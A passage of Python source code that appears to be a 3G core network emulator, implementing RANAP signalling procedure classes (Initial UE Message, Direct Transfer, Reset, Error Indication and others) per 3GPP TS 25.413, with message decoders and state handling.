desc.append('positioning method %i (%s) and usage %i (%s)'\\\n % (pm, cls._PosMethLUT[pm], pu, cls._UsageLUT[pu]))\n if len(ds) > 1:\n pmu = ord(ds[1])\n pm, pid, pu = pmu>>6, (pmu>>3)&0x7, pmu&0x7\n desc.append('GANSS positioning method %i (%s), id %i (%s), usage %i (%s)'\\\n % (pm, cls._GANSSPosMethLUT[pm], pid, cls._GANSSID[pid], pu, cls._UsageLUT[pu]))\n if len(ds) > 2:\n pmu = ord(ds[2])\n pm, pid, pu = pmu>>6, (pmu>>3)&0x7, pmu&0x7\n desc.append('additional positioning method %i (%s), id %i (%s), usage %i (%s)'\\\n % (pm, cls._AddPosMethLUT[pm], pid, cls._AddID[pid], pu, cls._UsageLUT[pu]))\n #\n elif disc == 1:\n pmu = ord(ds[1])\n pm, pid, pu = pmu>>6, (pmu>>3)&0x7, pmu&0x7\n desc.append('GANSS positioning method %i (%s), id %i (%s), usage %i (%s)'\\\n % (pm, cls._GANSSPosMethLUT[pm], pid, cls._GANSSID[pid], pu, cls._UsageLUT[pu]))\n if len(ds) > 2:\n pmu = ord(ds[2])\n pm, pid, pu = pmu>>6, (pmu>>3)&0x7, pmu&0x7\n desc.append('additional positioning method %i (%s), id %i (%s), usage %i (%s)'\\\n % (pm, cls._AddPosMethLUT[pm], pid, cls._AddID[pid], pu, cls._UsageLUT[pu]))\n #\n elif disc == 2:\n pmu = ord(ds[2])\n pm, pid, pu = pmu>>6, (pmu>>3)&0x7, pmu&0x7\n desc.append('additional positioning method %i (%s), id %i (%s), usage %i (%s)'\\\n % (pm, cls._AddPosMethLUT[pm], pid, cls._AddID[pid], pu, cls._UsageLUT[pu]))\n #\n return desc\n\n\nclass RANAPDataVolumeReport(RANAPSigProc):\n \"\"\"Data Volume Report: TS 25.413, section 8.21\n \n CN-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 33: RAB_DataVolumeReportRequestList (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 31: RAB_DataVolumeReportList (O)\n - 72: RAB_FailedtoReportList (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.dataVolumeReport\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n send = RANAPSigProc._send\n \n def recv(self, pdu):\n self._recv(pdu)\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n if not self.errcause:\n # TODO: do something with the data volume report\n self._log('INF', 'success')\n\n\nclass RANAPInitialUEMessage(RANAPSigProc):\n \"\"\"Initial UE Message: TS 25.413, section 8.22\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 15: LAI (M)\n - 16: NAS_PDU (M)\n - 55: RAC (C)\n - 58: SAI (M)\n - 79: IuSignallingConnectionIdentifier (M)\n - 86: GlobalRNC_ID (M)\n Extensions:\n - 23: PermanentNAS_UE_ID (O)\n - 108: GERAN_Classmark (O)\n - 127: PLMNidentity (O)\n - 130: NAS_SequenceNumber (O)\n - 166: RedirectAttemptFlag (O)\n - 171: ExtendedRNC_ID (O)\n - 203: CSG_Id (O)\n - 235: Cell_Access_Mode (O)\n - 241: TransportLayerAddress (O)\n - 250: HigherBitratesThan16MbpsFlag (O)\n - 262: TunnelInformation (O)\n - 273: TransportLayerAddress (O)\n - 275: LHN_ID (O)\n - 286: SGSN_Group_Identity (O)\n - 290: UE_Usage_Type (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.initialUE_Message\n \n # Custom decoders\n Decod = {\n 'ini': ({\n 'LAI' : lambda x: (plmn_buf_to_str(x['pLMNidentity']),\n bytes_to_uint(x['lAC'], 16)),\n 'RAC' : lambda x: bytes_to_uint(x, 8),\n 'SAI' : lambda x: (plmn_buf_to_str(x['pLMNidentity']),\n bytes_to_uint(x['lAC'], 16),\n bytes_to_uint(x['sAC'], 
16)),\n        'IuSignallingConnectionIdentifier': lambda x: x[0],\n        'GlobalRNC_ID': lambda x: (plmn_buf_to_str(x['pLMNidentity']),\n                                   x['rNC-ID'])},\n        {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    def recv(self, pdu):\n        self._recv(pdu)\n        if not self.errcause:\n            # verification against HNBd parameters and HNBAP / RUA infos:\n            err, plmn = False, self.RNC.Config['PLMNidentity']\n            if self.UEInfo['CN_DomainIndicator'][:2].upper() != self.Iu.DOM:\n                self._log('WNG', 'invalid CN Domain Indicator, %s' % self.UEInfo['CN_DomainIndicator'][:2])\n                err = True\n            if self.UEInfo['LAI'] != (plmn, self.RNC.Config['LAC']):\n                self._log('WNG', 'invalid LAI, %s.%.4x' % self.UEInfo['LAI'])\n                err = True\n            if 'RAC' in self.UEInfo and self.UEInfo['RAC'] != self.RNC.Config['RAC']:\n                self._log('WNG', 'invalid RAC, %.2x' % self.UEInfo['RAC'])\n                err = True\n            if self.UEInfo['SAI'][2] != self.RNC.Config['SAC']:\n                self._log('WNG', 'invalid SAC, %.4x' % self.UEInfo['SAI'][2])\n                err = True\n            if self.UEInfo['GlobalRNC_ID'] != (plmn, self.RNC.RNC_ID):\n                self._log('WNG', 'invalid GlobalRNC-ID, %r' % (self.UEInfo['GlobalRNC_ID'], ))\n                err = True\n            if err:\n                # error cause: protocol, message-not-compatible-with-receiver-state\n                self.errcause = ('protocol', 99)\n        #\n        if not self.errcause:\n            # update mobility state\n            if self.Iu.DOM == 'CS':\n                self.Iu.MM.state = 'ACTIVE'\n            else:\n                self.Iu.GMM.state = 'ACTIVE'\n            # update UE location\n            self.UE.set_lai(*self.UEInfo['LAI'])\n            if 'RAC' in self.UEInfo:\n                self.UE.set_rac(self.UEInfo['RAC'])\n            # process the NAS PDU, and get a list (potentially empty) of new\n            # RANAP procedures to be run\n            self._ret = self.Iu.process_nas(self.UEInfo['NAS_PDU'])\n    \n    def trigger(self):\n        return self._ret\n\n\nclass RANAPDirectTransferCN(RANAPSigProc):\n    \"\"\"Direct Transfer: TS 25.413, section 8.23\n    \n    CN-initiated\n    request only\n    connection-oriented signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 15: LAI (O)\n      - 16: NAS_PDU (M)\n      - 55: RAC (O)\n      - 58: SAI (O)\n      - 59: SAPI (O)\n      Extensions:\n      - 128: RedirectionCompleted (O)\n      - 129: RedirectionIndication (O)\n      - 202: SubscriberProfileIDforRFP (O)\n      - 241: TransportLayerAddress (O)\n      - 273: TransportLayerAddress (O)\n      - 275: LHN_ID (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.directTransfer\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    send = RANAPSigProc._send\n\n\nclass RANAPDirectTransferRNC(RANAPSigProc):\n    \"\"\"Direct Transfer: TS 25.413, section 8.23\n    \n    RNC-initiated\n    request only\n    connection-oriented signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 15: LAI (O)\n      - 16: NAS_PDU (M)\n      - 55: RAC (O)\n      - 58: SAI (O)\n      - 59: SAPI (O)\n      Extensions:\n      - 128: RedirectionCompleted (O)\n      - 129: RedirectionIndication (O)\n      - 202: SubscriberProfileIDforRFP (O)\n      - 241: TransportLayerAddress (O)\n      - 273: TransportLayerAddress (O)\n      - 275: LHN_ID (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.directTransfer\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({\n        'LAI' : lambda x: (plmn_buf_to_str(x['pLMNidentity']),\n                           bytes_to_uint(x['lAC'], 16)),\n        'RAC' : lambda x: bytes_to_uint(x, 8),\n        'SAI' : lambda x: (plmn_buf_to_str(x['pLMNidentity']),\n                           bytes_to_uint(x['lAC'], 16),\n                           bytes_to_uint(x['sAC'], 16))},\n        {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    
Encod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    def recv(self, pdu):\n        self._recv(pdu)\n        if not self.errcause:\n            # verification against HNBd parameters and HNBAP / RUA infos:\n            err = False\n            if 'LAI' in self.UEInfo:\n                if self.UEInfo['LAI'] != (self.RNC.Config['PLMNidentity'],\n                                          self.RNC.Config['LAC']):\n                    self._log('WNG', 'invalid LAI, %s.%.4x' % self.UEInfo['LAI'])\n                    err = True\n                else:\n                    # update UE location\n                    self.UE.set_lai(*self.UEInfo['LAI'])\n            if 'RAC' in self.UEInfo:\n                if self.UEInfo['RAC'] != self.RNC.Config['RAC']:\n                    self._log('WNG', 'invalid RAC, %.2x' % self.UEInfo['RAC'])\n                    err = True\n                else:\n                    # update UE RAC\n                    self.UE.set_rac(self.UEInfo['RAC'])\n            if 'SAI' in self.UEInfo and \\\n            self.UEInfo['SAI'][2] != self.RNC.Config['SAC']:\n                self._log('WNG', 'invalid SAC, %.4x' % self.UEInfo['SAI'][2])\n                err = True\n            if err:\n                # this means the RNC changed its local config without first informing the CN\n                # error cause: protocol, message-not-compatible-with-receiver-state\n                self.errcause = ('protocol', 99)\n        #\n        if not self.errcause:\n            # process the NAS PDU, and get a list (potentially empty) of new\n            # RANAP procedures to be triggered\n            self._ret = self.Iu.process_nas(self.UEInfo['NAS_PDU'])\n    \n    def trigger(self):\n        return self._ret\n\n\nclass RANAPOverloadControlCN(RANAPConlessSigProc):\n    \"\"\"Overload Control: TS 25.413, section 8.25\n    \n    CN-initiated\n    request only\n    connection-less signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 18: NumberOfSteps (O)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 3: CN_DomainIndicator (O)\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n      - 245: Priority_Class_Indicator (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.overloadControl\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # not implemented\n\n\nclass RANAPOverloadControlRNC(RANAPConlessSigProc):\n    \"\"\"Overload Control: TS 25.413, section 8.25\n    \n    RNC-initiated\n    request only\n    connection-less signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 18: NumberOfSteps (O)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 3: CN_DomainIndicator (O)\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n      - 245: Priority_Class_Indicator (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.overloadControl\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # not implemented\n\n\nclass RANAPResetCN(RANAPConlessSigProc):\n    \"\"\"Reset: TS 25.413, section 8.26\n    \n    CN-initiated\n    request-response\n    connection-less signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 3: CN_DomainIndicator (M)\n      - 4: Cause (M)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n    SuccessfulOutcome:\n      IEs:\n      - 3: CN_DomainIndicator (M)\n      - 9: CriticalityDiagnostics (O)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.reset\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': None\n        }\n    \n    send = RANAPConlessSigProc._send\n    \n    def recv(self, pdu):\n        self._recv(pdu)\n        try:\n            del 
self.RNC.ProcRanap[self.Code]\n        except Exception:\n            pass\n        if not self.errcause:\n            self._log('INF', 'success')\n\n\nclass RANAPResetRNC(RANAPConlessSigProc):\n    \"\"\"Reset: TS 25.413, section 8.26\n    \n    RNC-initiated\n    request-response\n    connection-less signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 3: CN_DomainIndicator (M)\n      - 4: Cause (M)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n    SuccessfulOutcome:\n      IEs:\n      - 3: CN_DomainIndicator (M)\n      - 9: CriticalityDiagnostics (O)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.reset\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': None\n        }\n    \n    def recv(self, pdu):\n        # recv the reset indication\n        self._recv(pdu)\n        if not self.errcause:\n            self._log('INF', 'cause %r' % (self.RNCInfo['Cause'], ))\n            # reset all UE connections handled by the RNC handler in the core network\n            # domain indicated\n            if self.RNCInfo['CN_DomainIndicator'] == 'ps-domain':\n                for ue in self.RNC.UE_IuPS.values():\n                    ue.IuPS.unset_ran()\n                    ue.IuPS.unset_ctx()\n                self.RNC.UE_IuPS.clear()\n            else:\n                for ue in self.RNC.UE_IuCS.values():\n                    ue.IuCS.unset_ran()\n                    ue.IuCS.unset_ctx()\n                self.RNC.UE_IuCS.clear()\n    \n    def send(self):\n        # copy requested IEs in response\n        IEs = {'CN_DomainIndicator': self.RNCInfo['CN_DomainIndicator']}\n        if 'GlobalRNC_ID' in self.RNCInfo:\n            IEs['GlobalRNC_ID'] = self.RNCInfo['GlobalRNC_ID']\n        if 'GlobalCN_ID' in self.RNCInfo:\n            IEs['GlobalCN_ID'] = self.RNCInfo['GlobalCN_ID']\n        if 'ExtendedRNC_ID' in self.RNCInfo:\n            IEs['ExtendedRNC_ID'] = self.RNCInfo['ExtendedRNC_ID']\n        self.encode_pdu('suc', **IEs)\n        return self._send()\n\n\nclass RANAPErrorIndConlessCN(RANAPConlessSigProc):\n    \"\"\"Error Indication: TS 25.413, section 8.27\n    \n    CN-initiated\n    request only\n    connection-less signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 3: CN_DomainIndicator (O)\n      - 4: Cause (O)\n      - 9: CriticalityDiagnostics (O)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.errorIndication\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    errcause = None\n    \n    def recv(self, pdu):\n        if self.TRACK_PDU:\n            self._pdu.append( (time(), 'UL', pdu) )\n    \n    send = RANAPConlessSigProc._send\n\n\nclass RANAPErrorIndConlessRNC(RANAPConlessSigProc):\n    \"\"\"Error Indication: TS 25.413, section 8.27\n    \n    RNC-initiated\n    request only\n    connection-less signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 3: CN_DomainIndicator (O)\n      - 4: Cause (O)\n      - 9: CriticalityDiagnostics (O)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.errorIndication\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    def recv(self, pdu):\n        self._recv(pdu)\n        if not self.errcause and 'Cause' in self.RNCInfo:\n            self._log('WNG', 'error ind received: %s.%i' % self.RNCInfo['Cause'])\n            # if it corresponds to a previously CN-initiated class 1 procedure\n            # abort it\n            
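# (the decoded Cause is a 2-tuple, e.g. ('protocol', 97); ProcRanapLast is\n            # assumed to hold the code of the last CN-initiated procedure sent)\n            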
try:\n                self.RNC.ProcRanap[self.RNC.ProcRanapLast].abort()\n            except Exception:\n                pass\n\n\nclass RANAPErrorIndCN(RANAPSigProc):\n    \"\"\"Error Indication: TS 25.413, section 8.27\n    \n    CN-initiated\n    request only\n    connection-oriented signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 3: CN_DomainIndicator (O)\n      - 4: Cause (O)\n      - 9: CriticalityDiagnostics (O)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.errorIndication\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    errcause = None\n    \n    def recv(self, pdu):\n        if self.TRACK_PDU:\n            self._pdu.append( (time(), 'UL', pdu) )\n    \n    send = RANAPSigProc._send\n\n\nclass RANAPErrorIndRNC(RANAPSigProc):\n    \"\"\"Error Indication: TS 25.413, section 8.27\n    \n    RNC-initiated\n    request only\n    connection-oriented signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 3: CN_DomainIndicator (O)\n      - 4: Cause (O)\n      - 9: CriticalityDiagnostics (O)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.errorIndication\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    def recv(self, pdu):\n        self._recv(pdu)\n        if not self.errcause and 'Cause' in self.UEInfo:\n            self._log('WNG', 'error ind received: %s.%i' % self.UEInfo['Cause'])\n            # if it corresponds to a previously CN-initiated class 1 procedure\n            # abort it\n            try:\n                self.Iu.Proc[self.Iu.ProcLast].abort()\n            except Exception:\n                pass\n\n\nclass RANAPCNDeactivateTrace(RANAPSigProc):\n    \"\"\"CN Deactivate Trace: TS 25.413, section 8.28\n    \n    CN-initiated\n    request only\n    connection-oriented signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 65: TraceReference (M)\n      - 68: TriggerID (O)\n      Extensions:\n        None\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.cN_DeactivateTrace\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    def send(self):\n        try:\n            tracerefl = '0x%s' % hexlify(self.TraceReference).decode('ascii')\n        except Exception:\n            tracerefl = repr(self.TraceReference)\n        self._log('INF', 'sent with trace reference %s' % tracerefl)\n        return self._send()\n\n\nclass RANAPResetResourceCN(RANAPConlessSigProc):\n    \"\"\"Reset Resource: TS 25.413, section 8.29\n    \n    CN-initiated\n    request-response\n    connection-less signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 3: CN_DomainIndicator (M)\n      - 4: Cause (M)\n      - 77: ResetResourceList (M)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n    SuccessfulOutcome:\n      IEs:\n      - 3: CN_DomainIndicator (M)\n      - 9: CriticalityDiagnostics (O)\n      - 77: ResetResourceAckList (M)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.resetResource\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': None\n        }\n    \n    send = RANAPConlessSigProc._send\n    \n    def recv(self, 
pdu):\n        self._recv(pdu)\n        try:\n            del self.RNC.ProcRanap[self.Code]\n        except Exception:\n            pass\n        if not self.errcause:\n            self._log('INF', 'success')\n\n\nclass RANAPResetResourceRNC(RANAPConlessSigProc):\n    \"\"\"Reset Resource: TS 25.413, section 8.29\n    \n    RNC-initiated\n    request-response\n    connection-less signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 3: CN_DomainIndicator (M)\n      - 4: Cause (M)\n      - 77: ResetResourceList (M)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n    SuccessfulOutcome:\n      IEs:\n      - 3: CN_DomainIndicator (M)\n      - 9: CriticalityDiagnostics (O)\n      - 77: ResetResourceAckList (M)\n      - 86: GlobalRNC_ID (O)\n      Extensions:\n      - 96: GlobalCN_ID (O)\n      - 171: ExtendedRNC_ID (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.resetResource\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': None\n        }\n    \n    def recv(self, pdu):\n        self._recv(pdu)\n        if not self.errcause:\n            self._log('INF', 'cause %r' % (self.RNCInfo['Cause'], ))\n            RResList, RResIds = self.RNCInfo['ResetResourceList'], []\n            try:\n                # we expect a single prot container (TODO: to be confirmed)\n                assert(len(RResList) == 1)\n                RResList = RResList[0]\n                for RRes in RResList:\n                    RResIds.append(RRes['value'][1]['iuSigConId'][0])\n            except Exception:\n                self._log('WNG', 'unexpected formatting of ResetResourceList')\n            #\n            # reset all UE connections handled by the RNC handler self.RNC in the\n            # core network domain indicated\n            if self.RNCInfo['CN_DomainIndicator'] == 'ps-domain':\n                for rres in RResIds:\n                    try:\n                        ue = self.RNC.UE_IuPS[rres]\n                    except Exception:\n                        pass\n                    else:\n                        ue.IuPS.SM.pdp_suspend()\n                        if ue.IuPS.GMM.state != 'INACTIVE':\n                            ue.IuPS.GMM.state = 'IDLE'\n                        ue.IuPS.unset_ran()\n                        ue.IuPS.unset_ctx()\n                        del self.RNC.UE_IuPS[rres]\n            else:\n                for rres in RResIds:\n                    try:\n                        ue = self.RNC.UE_IuCS[rres]\n                    except Exception:\n                        pass\n                    else:\n                        if ue.IuCS.MM.state != 'INACTIVE':\n                            ue.IuCS.MM.state = 'IDLE'\n                        ue.IuCS.unset_ran()\n                        ue.IuCS.unset_ctx()\n                        del self.RNC.UE_IuCS[rres]\n            self.RResIds = RResIds\n    \n    def send(self):\n        if self.errcause:\n            # no unsuccessful outcome possible, send an error ind\n            Proc = self.RNC.init_ranap_proc(RANAPErrorIndConlessCN, Cause=self.errcause)\n            if Proc:\n                return Proc.send()\n            else:\n                return []\n        else:\n            # prepare response IEs\n            IEs = {'CN_DomainIndicator': self.RNCInfo['CN_DomainIndicator']}\n            if 'GlobalRNC_ID' in self.RNCInfo:\n                IEs['GlobalRNC_ID'] = self.RNCInfo['GlobalRNC_ID']\n            if 'GlobalCN_ID' in self.RNCInfo:\n                IEs['GlobalCN_ID'] = self.RNCInfo['GlobalCN_ID']\n            if 'ExtendedRNC_ID' in self.RNCInfo:\n                IEs['ExtendedRNC_ID'] = self.RNCInfo['ExtendedRNC_ID']\n            RResAck = []\n            IEs['ResetResourceAckList'] = [RResAck]\n            for rres in self.RResIds:\n                RResAck.append({'id': 78, 'criticality': 'reject',\n                                'value': ('ResetResourceItem', {'iuSigConId': (rres, 24)})})\n            self.encode_pdu('suc', **IEs)\n            return self._send()\n\n\nclass RANAPRABModificationRequest(RANAPSigProc):\n    \"\"\"RAB Modification Request: TS 25.413, section 8.30\n    \n    RNC-initiated\n    request only\n    connection-oriented signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 91: RAB_ModifyList (M)\n      Extensions:\n        None\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.rAB_ModifyRequest\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        
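# request-only procedure: there is no response PDU to encode\n        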
'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPLocationRelatedData(RANAPSigProc):\n \"\"\"Location Related Data: TS 25.413, section 8.31\n \n CN-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 95: LocationRelatedDataRequestType (O)\n Extensions:\n - 115: LocationRelatedDataRequestTypeSpecificToGERANIuMode (O)\n - 185: RequestedGANSSAssistanceData (C)\n SuccessfulOutcome:\n IEs:\n - 94: BroadcastAssistanceDataDecipheringKeys (O)\n Extensions:\n - 9: CriticalityDiagnostics (O)\n - 186: BroadcastAssistanceDataDecipheringKeys (O)\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n Extensions:\n - 9: CriticalityDiagnostics (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.locationRelatedData\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n send = RANAPSigProc._send\n \n def recv(self, pdu):\n self._recv(pdu)\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n #\n if self.errcause:\n self.success = False\n elif pdu[0] == 'unsuccessfulOutcome':\n self.success = False\n try:\n self._log('WNG', 'failure, rejected with cause %r' % (self.UEInfo['Cause'], ))\n except Exception:\n self._log('WNG', 'failure, rejected without cause')\n else:\n self.success = True\n self._log('INF', 'success')\n # TODO: do something with the returned info\n\n\nclass RANAPInformationTransfer(RANAPConlessSigProc):\n \"\"\"Information Transfer: TS 25.413, section 8.32\n \n CN-initiated\n request-accept, request-reject\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 96: GlobalCN_ID (O)\n - 104: InformationTransferID (M)\n - 106: ProvidedData (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 9: CriticalityDiagnostics (O)\n - 86: GlobalRNC_ID (M)\n - 104: InformationTransferID (M)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n UnsuccessfulOutcome:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n - 86: GlobalRNC_ID (M)\n - 104: InformationTransferID (M)\n Extensions:\n - 171: ExtendedRNC_ID (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.informationTransfer\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPUESpecificInformation(RANAPSigProc):\n \"\"\"UE Specific Information: TS 25.413, section 8.33\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 118: UESBI_Iu (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.uESpecificInformation\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPDirectInformationTransferCN(RANAPConlessSigProc):\n \"\"\"Direct Information Transfer: TS 25.413, section 8.34\n \n CN-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 86: GlobalRNC_ID (O)\n - 96: GlobalCN_ID (O)\n - 126: InterSystemInformationTransferType (O)\n 
